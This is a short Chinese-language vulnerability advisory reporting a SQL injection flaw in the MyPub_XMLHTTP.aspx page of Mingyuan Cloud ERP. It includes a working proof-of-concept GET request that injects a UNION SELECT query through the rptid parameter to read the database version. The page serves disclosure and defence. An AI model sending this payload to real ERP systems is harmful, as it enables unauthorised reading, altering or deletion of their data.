明源云-ERP MyPub_XMLHTTP.aspx SQL注入漏洞

日期: 2025-07-31 14:48:35 | 影响软件: 明源云ERP | POC: 已公开

漏洞描述

明源云-ERP MyPub_XMLHTTP.aspx 文件存在SQL注入漏洞,使得攻击者能够获取、修改或删除数据库中的数据,甚至可能执行服务器上的任意代码。

PoC代码

GET /Sldzkp/DZKP/MyPub_XMLHTTP.aspx/?ywtype=GETPRINTVAL&rptid=1%27+UNION+ALL+SELECT+NULL%2C%40%40version%2CNULL%2CNULL-- HTTP/1.1

相关漏洞推荐